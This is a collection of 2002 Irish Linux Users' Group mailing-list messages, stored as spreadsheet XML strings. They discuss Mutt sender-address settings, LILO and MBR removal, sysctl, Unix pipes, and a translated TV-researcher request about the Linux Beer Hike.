Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue 30 Jul 2002 10:28, David Neary wrote:&gt;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to.I don't know Mutt, to be honest, but the KDE mail client "KMail" can
do this very neatly -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It's
all very cool, and it works very nicely.But I still don't know how to do it in Mutt.             Colm-- 
Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
A dirty mind is a terrible thing to waste.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi David,Try putting "set reverse_name" in your .muttrc.Regards,Gavin.
**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses.www.mimesweeper.com
**********************************************************************-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 11:28:11AM +0200, David Neary mentioned:
&gt; For example, say I have a company, and sales@company.com,
&gt; info@company.com and tech@company.com arrive in the same mailbox.
&gt; I don't want to reply to sales@company.com mails with the From:
&gt; set to dave@company.com, I would like the mail to come from
&gt; sales@company.com. Best thing to do would be to have each of those addresses going to a
different folder, then set your "from" address based on the folder you are
in, when replying.john
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,havn't tried this, but looks like what you want.  I use procmail to filter
different incomgin To/CCs to different folders then use folder hok, but
this looks closer to what you want.
http://www.linuxcare.com/viewpoints/ap-of-the-wk/03-31-00.epl**************************************************************************
Some of the mailto links on our web site forward to me. When I reply to
someone who writes to one of these aliases, I prefer to keep the mail alias
as the From: address in my reply. For example, when someone sends email to
coolapps@linuxcare.com to suggest a program for me to review [pardon the
blatant plug...], it forwards to me. When I hit reply, the From: line in
the email will contain coolapps@linuxcare.com instead of my main address
bneely@linuxcare.com. My .muttrc file accomplishes this with two lines:set alternates = "kbeditor@linuxcare.com|coolapps@linuxcare.com"
set reverse_name**************************************************************************On Tue, 30 Jul 2002, David Neary wrote:&gt;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&gt;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 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 11:28:11AM +0200, David Neary wrote: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recipients...i sort my mail into folders using procmail.  so typically i'm in the
ilug folder for ilug mail, the doolin folder for doolin mail, etc.
so i use folder-hooks to accomplish that.  as an example (i do line
wrapping to keep it less then 80 chars long - spacing is important):folder-hook . "my_hdr From: kevin lyda ;"\
"my_hdr X-GPG-Fingerprint: 9C1D 16F4 11F1 6BD2 933C  048D ACC7 9840 89D0 7646;"\
"set pgp_sign_as=0x89D07646;set signature=~/.signature;"\
"set folder=~/Mail;set record=~/Mail/outbox;set postponed=~/Mail/postponed"
folder-hook /(alphyra|Alphyra/[^.].*) \
"my_hdr From: kevin lyda ;my_hdr X-GPG-Fingerprint: "\
"088E 2BC4 381E 990A 1E0E  1DA0 4D44 99EF 20E6 38A0;"\
"set pgp_sign_as=0x20E638A0;set signature=~/.signature.d/itg.sig;"\
"set folder=~/Mail/Alphyra;set record=~/Mail/Alphyra/outbox;"\
"set postponed=~/Mail/Alphyra/postponed"you could also do this with send hooks.  i use them to tweak gpg settings:send-hook .			"unset pgp_autoencrypt;set pgp_autosign"
send-hook (ilug|webdev|social)@linux.ie	\
				"unset pgp_autosign;unset pgp_autoencrypt"and then i have an include file with all people who have keys.kevin--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</si>
  <si>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Hi,On Tue, 30 Jul 2002, Gavin McCullagh wrote:&gt; set alternates = "kbeditor@linuxcare.com|coolapps@linuxcare.com"
&gt; set reverse_namePS Make sure not to have a line like this:	send-hook .  'my_hdr From: Gavin McCullagh "which will only override it and cause pain and suffering.Gavin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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little.I would question anything being ready for "production" being in
STABLE.He's kept backwards compatibility with ipfw, which is major plus.My point about IPFW2 being rolled out into stable was merely an
illustration of the fact that ipfw is indeed not ipfilter, and that
there are no license issues there :)-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-07-30 at 10:06, Donncha O Caoimh wrote:
&gt; Ar mhaith le einne anseo caint le TG4 faoin LBW?
&gt; 
&gt; Donncha.
&gt; ----8&lt;&gt; TÃ¡ mÃ© ag dÃ©anamh taighde don clÃ¡r teilifÃ­se An Tuath Nua (a bhÃ­onn Ã¡
&gt; chraoladh ar TG4) faoi lÃ¡thair, agus chonaic mÃ© go mbedih an Linux Beer
&gt; Hike ar siÃºl i Doolin i mbliana. Bheadh spÃ©is againn mÃ­r a dhÃ©anamh mar
&gt; gheall ar an Hike ar an gclÃ¡r - an mbeidh tÃº fÃ©in nÃ³ aon duine eile le
&gt; Gaeilge ar an Hike go bhfios duit?
&gt; 
&gt; Go raibh maith agat as do chabhair,
&gt; ----&gt;8Can someone translate this for me? Lost all sense of Irish when moved
over the border about 10 years ago. Not by choice mind you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
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 01:17:25PM +0100, Patton, Tony wrote:
&gt; On Tue, 2002-07-30 at 10:06, Donncha O Caoimh wrote:
&gt; &gt; Ar mhaith le einne anseo caint le TG4 faoin LBW?
&gt; &gt; 
&gt; &gt; Donncha.
&gt; &gt; 
&gt; 
&gt; ----8&lt;
&gt; 
&gt; &gt; TÃ¡ mÃ© ag dÃ©anamh taighde don clÃ¡r teilifÃ­se An Tuath Nua (a bhÃ­onn Ã¡
&gt; &gt; chraoladh ar TG4) faoi lÃ¡thair, agus chonaic mÃ© go mbedih an Linux Beer
&gt; &gt; Hike ar siÃºl i Doolin i mbliana. Bheadh spÃ©is againn mÃ­r a dhÃ©anamh mar
&gt; &gt; gheall ar an Hike ar an gclÃ¡r - an mbeidh tÃº fÃ©in nÃ³ aon duine eile le
&gt; &gt; Gaeilge ar an Hike go bhfios duit?
&gt; &gt; 
&gt; &gt; Go raibh maith agat as do chabhair,
&gt; &gt; 
&gt; 
&gt; ----&gt;8
&gt; 
&gt; Can someone translate this for me? Lost all sense of Irish when moved
&gt; over the border about 10 years ago. Not by choice mind you :-(
"Currently, I am doing some research for the telivision programme 
"An Tuath Nua"  (which is broadcast by TG4) , and I saw that the
Linux Beer Hike will be in Doolin this year. We'd be intrested 
in including a report on the hike in the programme - will yourself
or anyone else with Irish be on the Hike do you know ?Thanks for your help."-- 
colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
Web:                                 http://devnull.redbrick.dcu.ie/ -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Patton, Tony wrote:
&gt; On Tue, 2002-07-30 at 10:06, Donncha O Caoimh wrote:
&gt; &gt; Ar mhaith le einne anseo caint le TG4 faoin LBW?
&gt; &gt; 
&gt; &gt; Donncha.
&gt; &gt; 
&gt; 
&gt; ----8&lt;
&gt; 
&gt; &gt; TÃ¡ mÃ© ag dÃ©anamh taighde don clÃ¡r teilifÃ­se An Tuath Nua (a bhÃ­onn Ã¡
&gt; &gt; chraoladh ar TG4) faoi lÃ¡thair, agus chonaic mÃ© go mbedih an Linux Beer
&gt; &gt; Hike ar siÃºl i Doolin i mbliana. Bheadh spÃ©is againn mÃ­r a dhÃ©anamh mar
&gt; &gt; gheall ar an Hike ar an gclÃ¡r - an mbeidh tÃº fÃ©in nÃ³ aon duine eile le
&gt; &gt; Gaeilge ar an Hike go bhfios duit?
&gt; &gt; 
&gt; &gt; Go raibh maith agat as do chabhair,
&gt; &gt; 
&gt; 
&gt; ----&gt;8
&gt; 
&gt; Can someone translate this for me? Lost all sense of Irish when moved
&gt; over the border about 10 years ago. Not by choice mind you :-(In short, "I'm involved in making a TV program "The New Road"
(which will be on TG4) at the moment, and I saw that there'll be
a Linux Beer Hike in Doolin this year. We'd be delighted to do a
report about the hike for the programme - will yourself or
anyone else with Irish be on the hike? Thanks for the help,
A chara,Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 03:47:40PM +0100, Niall O Broin wrote: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finger)actually, on a related note, has anyone tried snapfs ?&gt; Unfortunately suck and it and see is rather tricky - the machines concerned
&gt; are not to hand.just keep root as hda, you can change boot all you want, that's
where it will get written when you run lilo from the prompt.
just have a sane lilo.conf (with root=/dev/hda) and use lilo -b
to write to different devices.-- 
colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
Web:                                 http://devnull.redbrick.dcu.ie/ -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-07-30 at 13:17, Patton, Tony wrote:8&lt;&gt; 
&gt; Can someone translate this for me? Lost all sense of Irish when moved
&gt; over the border about 10 years ago. Not by choice mind you :-(
&gt; 8&lt;Thanks to all who replied.Are there many from this list going to the LBW?I am trying to get the thursday and friday off work to get to it.Looking doubtful as it is very near the start of term. Bloody academic
institutes :-).it only going to take me about 6 hours or so to get there :-(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
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Niall O Broin :&gt; I'm installing warm standby disks on a number of boxes. These disks will be
&gt; the same size (sometimes bigger) than the main disk. The idea is that every
&gt; night I'll rsync the partitions on the main disk to the standby disk so
&gt; that
&gt; in the case of disaster, the first port of call, before the tapes, is the
&gt; standby disk. (We did consider running Linux md RAID on the disks but RAID
&gt; gives you no protection against slips of the finger)Do I get beaten round the head for saying "floppy"?
Assuming the machines are networked, let each one send a copy of its kernel to
the others.  If the drives are open-the-box-and-switch-cables, then you can
start dd'ing a floppy before you start.  If the drives are in drawers, then this
might slow you down by all of 60 seconds.Alternatively, you could use netboot.  No, I'm serious.  Set the boot sequence
to first hard disk then network.  Do NOT make any partition on the standby
active.  Have a look at the etherboot package.  One of the things it contains is
a pascal-ish language for writing boot menus.  You can write a one-liner that
basically says "boot /dev/hda1" (or whatever, there's example code).  IIRC, the
resulting "bootable image" is a whopping 4K.  The downside is you'll need a
bootp and tftp server somewhere....hth,
Ronan.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, after playing around with these strange wav files I realised I didn't 
even have sox installed. A quick apt-get install sox fixed this.Sox does reconise these AND even plays them in stereo! Following info from 
the CD-Writing HOW-TO I used sox to convert the Sgt Pepper's wav to cdr and 
wrote it to CD and now I've got a CD with ONE track that is the entire Sgt 
Peppers Album! Not too sure how over 500M of cdr reduces to only 51M of wav 
file but there it is?!?!And I've got loads of Beatles Albums and singles in these strange wav files!KEWL! Now I don't need to go buying them!Cheers,	John Gay
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I am the evil one, you will respect my authoritai ;--)Sorry, but I couldn't resist, I must say that mails like this really impress
me. coz I have pretty much no Irish at all, although my wee Girl starts
Gaelscoil in September so there hope for me yet :)Much Respect to the Gaeilgors out there. CW-------------------
mar
&gt; gheall ar an Hike ar an gclÃ¡r - an mbeidh tÃº fÃ©in nÃ³ aon duine eile le
&gt; Gaeilge ar an Hike go bhfios duit?
&gt; 
&gt; Go raibh maith agat as do chabhair,
&gt; ----&gt;8Can someone translate this for me? Lost all sense of Irish when moved
over the border about 10 years ago. Not by choice mind you :-(
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I thought perhaps I should just do   lilo -b /dev/hdb -r /mnt  but I think
&gt; that -b is analogous to the boot keyword in lilo.conf. Or will this just
&gt; work automagically ?  i.e. boot = /dev/hda tells lilo what numbers to poke
&gt; where, and it figures out where the disk is from the -r ?That won't work like you want.  You'll end up with a boot loader
on the backup disk that contains the 'physical' location of
the /boot/map file on the main disk.  That won't necessarily
be the same as the backup disk.I can't think of a right way to do his with LILO.  I've got
a similar seup on my home machine (rsync to a backup disk
every night), but I'll be pulling out the RH install CDs to
get LILO sorted if I have to do a disk swap.GRUB should be able to handle this no problem, since it
doesn't record sector numbers like LILO does.  Not much help
for you though...Later,
Kenn-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Are there any mailing lists (non-newsgroups) for C++ and C Beginners
and Advanced programmers?Links are welcomed!-- 
Note: When you reply to this message, please include the mailing
      list/newsgroup address and my email address in To:.*********************************************************************
Signed,
SoloCDM-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">When 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;--)Sorry, but I couldn't resist, I must say that mails like this really impress
me. coz I have pretty much no Irish at all, although my wee Girl starts
Gaelscoil in September so there hope for me yet :)Much Respect to the Gaeilgors out there. CW-------------------
mar
&gt; gheall ar an Hike ar an gclÃ¡r - an mbeidh tÃº fÃ©in nÃ³ aon duine eile le
&gt; Gaeilge ar an Hike go bhfios duit?
&gt; 
&gt; Go raibh maith agat as do chabhair,
&gt; ----&gt;8Can someone translate this for me? Lost all sense of Irish when moved
over the border about 10 years ago. Not by choice mind you :-(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</si>
  <si>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Satelle, StevenX wrote:
&gt; When I was in school they pushed Irish down my throat. I developed a hatred
&gt; for Irish. I did French for 3 years and German for 6 months, I could
&gt; (almost) hold a basic conversation. I am proud of the fact that I don't know
&gt; one word of Irish. Well, I'm hardly a GaeilgÃ³ir, but in general I wouldn't consider
either ability or inability in a language something to be proud
of... maybe it's just me, but I'm not proud that I can't speak
Italian, no more than I'm proud that I can speak French or
English.Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">SoloCDM wrote:
&gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners
&gt; and Advanced programmers?Try the following newsgroups - 
Beginners:
news:comp.lang.learn.c-c++More advanced: 
news:comp.lang.c
news:comp.lang.c++
news:comp.lang.c.moderatedAlso, you should keep a bookmark pointing at the comp.lang.c FAQ at 
http://www.eskimo.com/~scs/C-faq/top.htmlFor tutorials, the guy who maintains the clc FAQ (Steve Summit)
has a tutorial - http://www.eskimo.com/~scs/cclass/notes/top.html
Also you could have a look at the excercises he poses - all
linked from http://www.eskimo.com/~scs/cclass/cclass.htmlFor C++, I would guess that the comp.lang.c++ FAQ is a good place
to start - they're likely to have links to suggested reading
material.If you're going to do any amount of C programming, you should
think about getting K&amp;R2 (The C programming language, 2nd
edition, by Kernighan and Ritchie), for C++ the equivalent book
is Stroustrup. Although the C++ book is a lot bigger :)Hope this helps,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 11:28:05AM +0100, Satelle, StevenX mentioned:
&gt; When I was in school they pushed Irish down my throat. I developed a hatred
&gt; for Irish. I did French for 3 years and German for 6 months, I could
&gt; (almost) hold a basic conversation. I am proud of the fact that I don't know
&gt; one word of Irish.  Sad, that. I felt like that till recently, but now wish that it wasn't rammed down
my throat like worming tablets. If they hadn't, it is very possible I'd be
an Irish speaker.John
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 11:28:05AM +0100, Satelle, StevenX wrote:
&gt; When I was in school they pushed Irish down my throat. I developed a hatred
&gt; for Irish. I did French for 3 years and German for 6 months, I could
&gt; (almost) hold a basic conversation. I am proud of the fact that I don't know
&gt; one word of Irish. Going rapidly OT here, but I find it shocking that anybody could be
proud of not knowing something. It's like the tourist on holidays using
that speak-loudly-enough-and-they-will-understand technique or (slightly
less off-topic) the friend or relative who says "I know nothing
about computers!" and clearly doesn't intend to learn, and is happy
to let you clean up after them.I certainly agree that Irish is not taught all that well (or wasn't
when I was in school) but I'd like to be able to relearn it and to
count it as one of my skills.David-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 12:51:29PM +0200, David Neary wrote:
&gt; Also, you should keep a bookmark pointing at the comp.lang.c FAQ at 
&gt; http://www.eskimo.com/~scs/C-faq/top.htmland don't forget the c iaq.  that's here:    http://www.plethora.net/~seebs/faqs/c-iaq.htmlan example:    1.3: If I write the code int i, j; can I assume that (&amp;i + 1) == &amp;j?    Only sometimes. It's not portable, because in EBCDIC, i and j are not
    adjacent.kevin--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</si>
  <si>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Wed, Jul 31, 2002 at 12:51:29 +0200, David Neary wrote:
&gt; SoloCDM wrote:
&gt; &gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners
&gt; &gt; and Advanced programmers?
&gt; 
&gt; For C++, I would guess that the comp.lang.c++ FAQ is a good place
&gt; to start - they're likely to have links to suggested reading
&gt; material.
&gt; 
&gt; If you're going to do any amount of C programming, you should
&gt; think about getting K&amp;R2 (The C programming language, 2nd
&gt; edition, by Kernighan and Ritchie), for C++ the equivalent book
&gt; is Stroustrup. Although the C++ book is a lot bigger :)For C++, guru of the week at 
http://www.gotw.ca/gotw/index.htm (can get them in book form and
with extra material as Herb Sutters Essential C++ and More Essential C++)
is a good resource. Scott Meyers Effective C++, More Effective C++ and Effective STL
are truly handy books.I always felt that The C++ faq wasn't as good as the C faq, but
it lives at http://www.parashift.com/c++-faq-lite/C.
-- 
Caolan McNamara               |  caolan@skynet.ie  
http://www.skynet.ie/~caolan  |  +353 86 8161184
Verbing weirds language-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 12:02:01PM +0100, Satelle, StevenX mentioned:
&gt; I dislike being forced to learn something and mostly refuse to do it.  Did you burn yourself often, as a child ?John
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I have 3rd degree burn scars on both hands. I can hold that match if I want
to :-)-----Original Message-----
From: John P. Looney [mailto:valen@tuatha.org]
Sent: 31 July 2002 12:26
To: Irish LUG
Subject: Re: [ILUG] Fwd: Linux Beer Hike
On Wed, Jul 31, 2002 at 12:02:01PM +0100, Satelle, StevenX mentioned:
&gt; I dislike being forced to learn something and mostly refuse to do it.  Did you burn yourself often, as a child ?John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</si>
  <si>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Quoting Brian Foster :
&gt;   | I did the following:
&gt;   | 
&gt;  1|   $ mkfifo f1
&gt;  2|   $ lav2yuv capture.avi | yuvdenoise | tee f1 | mpeg2enc blah blah &amp;
&gt;  3|   $ cat f1 | mpeg2enc different blah blah
&gt;   | 
&gt;   | And hey! It works!  Until somebody dies!  Yippe... oh.  [ ... ]
&gt; 
&gt;  ( a winner of the Useless Use of cat(1) Award:  you don't need
&gt;   the `cat f1 |' in the 3rd line, a simple `  upshot is a POSIX.2 `tee' would probably spit out an error
&gt;  message if one of the `mpeg2enc's dies, but the remaining
&gt;  one would continue to be fed data and hence run until it
&gt;  either completes or dies for reasons of its own.  which is
&gt;  exactly what you want!   so what is happening??
  Oops.
Um, my test was to tee to a fifo I didn't read from... resulting in the other
reader hanging around forever.... not realising that never-opened-for-reading
and opened-and-later-closed might be different.  Sensible behaviour has now been
observed.
&gt;  incidently, if your shell and system both support process
&gt;  redirection, you could do the above as a one-liner.  syntax
&gt;  varies depending on the shell, but in bash(1) and ksh(1):
&gt; 
&gt;      lav2yuv capture.avi | yuvdenoise | \
&gt;          tee &gt;(mpeg2enc different blah blah) | mpeg2enc blah blah
mpeg2enc generates stats during the run, so I give each one an xterm.Thanks,
Ronan
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> OK, I guess that sysctl.conf is the best way of setting     /proc/sys/fs/file-max to a nice big number. Can you make a change to /etc/sysctl.conf, and then
have it take effect, without a reboot (to test it, really) ?John
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;  OK, I guess that sysctl.conf is the best way of setting
&gt;
&gt;     /proc/sys/fs/file-max
&gt;
&gt;  to a nice big number. Can you make a change to /etc/sysctl.conf, and then
&gt; have it take effect, without a reboot (to test it, really) ?man sysctl   # sysctl -pLater,
Kenn
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
&gt;  OK, I guess that sysctl.conf is the best way of setting 
&gt; 
&gt;     /proc/sys/fs/file-max
&gt; 
&gt;  to a nice big number. Can you make a change to /etc/sysctl.conf, and then
&gt; have it take effect, without a reboot (to test it, really) ?
&gt; 
&gt; John
&gt; 
&gt; Have a look at the manual page for the sysctl command?Cheers,
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 04:24:17PM +0100, Kenn Humborg mentioned:
&gt; man sysctl
&gt;    # sysctl -p Ah right. Actually, sysctl -a was more helpful - shows why setting
sys.fs.files-nr didn't work..KAte
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
&gt;  OK, I guess that sysctl.conf is the best way of setting 
&gt; 
&gt;     /proc/sys/fs/file-maxcat 20480 &gt; /proc/sys/fs/file-maxta dah...Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Lacking a DOS boot disk, I just looked for a different way to do it
yesterday.  You can use
    lilo -u /dev/hdaSourced via google search "remove lilo" which returned
http://support.microsoft.com/default.aspx?scid=KB;EN-US;q315224&amp;Much handier if you only have tomsrtbt or something similar.jr
----- Original Message -----
From: "jac1" 
To: 
Sent: Wednesday, July 31, 2002 2:30 PM
Subject: [ILUG] removing lilo
&gt; hi,
&gt; i recently had to wipe linux from my pc but forgot to restore the original
&gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no
boot
&gt; floppy. formatting the entire disk doesn't do it either.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</si>
  <si>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 xml:space="preserve">"Good" ol dos fdisk /mbr should do the twickBut...but... Jac, your a big linux head....why?regards,
CW------------
hi,
i recently had to wipe linux from my pc but forgot to restore the original
MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
floppy. formatting the entire disk doesn't do it either.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, kevin lyda wrote:&gt; saw this on mutt users.  might be a handy trick for those of with
&gt; hyperactive archiving genes...  :)
&gt; 
&gt; this might work better in this long run though:
&gt; 
&gt;    set record='~/Mail/outbox-`date "+%Y-%m"`'A nice followon of this for the obsessive archiver is:Procmail:
.procmail/rc.mail
	:0:
	* ^Subject.*\[ILUG\]
	:ilug-`date "+%m-%Y"`
	and Mutt:
.muttrc:
	mailboxes =ilug-`date "+%m-%Y"` does mean threads get broken at the start of the month though :(Gavin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">"Hunt, Bryan" stated the following:
&gt; 
&gt; you need to do a "fdisk /mbr" from a bootable windoze floppy
&gt; alternatively boot from linux boot disk and do fdisk, delete all partitions.I need to ask a question concerning this issue.What if I don't want to get rid of the MBR -- it will destroy the OS
on that drive.  How do I remove lilo without the above fdisk
procedure?&gt; -----Original Message-----
&gt; From: jac1 [mailto:jac1@student.cs.ucc.ie]
&gt; 
&gt; i recently had to wipe linux from my pc but forgot to restore the original
&gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
&gt; floppy. formatting the entire disk doesn't do it either.-- 
Note: When you reply to this message, please include the mailing
      list/newsgroup address and my email address in To:.*********************************************************************
Signed,
SoloCDM-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
"fdisk /mbr" will not destroy the OS, it will simply restore the windows
mbr as it was.  Running fdisk and deleting a partition would however
destroy the OS (bu even then only if you format the disc afterwards).
Sure wasn't it SoloCDM  
sometime around Wed, 31 Jul 2002 10:48:16 -0600 said:
&gt; I need to ask a question concerning this issue.
&gt; 
&gt; What if I don't want to get rid of the MBR -- it will destroy the OS
&gt; on that drive.  How do I remove lilo without the above fdisk
&gt; procedure?
&gt; 
-- 
Paul Askins &lt;:)
Email:  Paul Askins Behind every great man, there is a woman -- urging him on.
		-- Harry Mudd, "I, Mudd", stardate 4513.3-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 31 Jul 2002 10:48:16 -0600
SoloCDM claiming to think:&gt; "Hunt, Bryan" stated the following:
&gt; &gt; 
&gt; &gt; you need to do a "fdisk /mbr" from a bootable windoze floppy
&gt; &gt; alternatively boot from linux boot disk and do fdisk, delete all partitions.
&gt; 
&gt; I need to ask a question concerning this issue.
&gt; 
&gt; What if I don't want to get rid of the MBR -- it will destroy the OS
&gt; on that drive.  How do I remove lilo without the above fdisk
&gt; procedure?
&gt; 
fdisk /mbr will restore a dos MBR.. it'll leave the partitions alone.linux fdisk and deleting all partitions will actually leave LILO in the
MBR though.L.
-- 
     dBP   dBBBBb | If you're looking at me to be an accountant
              dBP | Then you will look but you will never see
   dBP    dBBBK'  | If you're looking at me to start having babies
  dBP    dB' db   | Then you can wish because I'm not here to fool around
 dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Wed, 31 Jul 2002 15:13:23 +0100
  | From: Ronan Cunniffe 
  | 
  | Um, my test was to tee to a fifo I didn't read from... resulting
  | in the other reader hanging around forever.... not realising that
  | never-opened-for-reading and opened-and-later-closed might be
  | different. ah!  yes!  this is one of those gotchas everyone stumbles
 over.  the writer of a never-opened-for-reading pipe will
 quickly block (as soon as the pipe's limited buffer fills
 up).  but the writer of opened-and-later-closed pipe gets
 an EPIPE error (and the usually-terminal SIGPIPE signal). the typical stumble is someone creates an anonymous pipe
 with pipe(2), but forgets to close(2) the reader's fd in
 the writer-process (or visa-versa) .... and then wonders
 why the real reader never sees an EOF and/or the writer
 is never gets an EPIPE/SIGPIPE.  various FAQs and many
 books probably discuss this topic in depth to the death.  |             Sensible behaviour has now been observed. good!  and good luck.
cheers,
	-blf-
--
Â«How many surrealists does it take to    |  Brian Foster    Dublin, Ireland
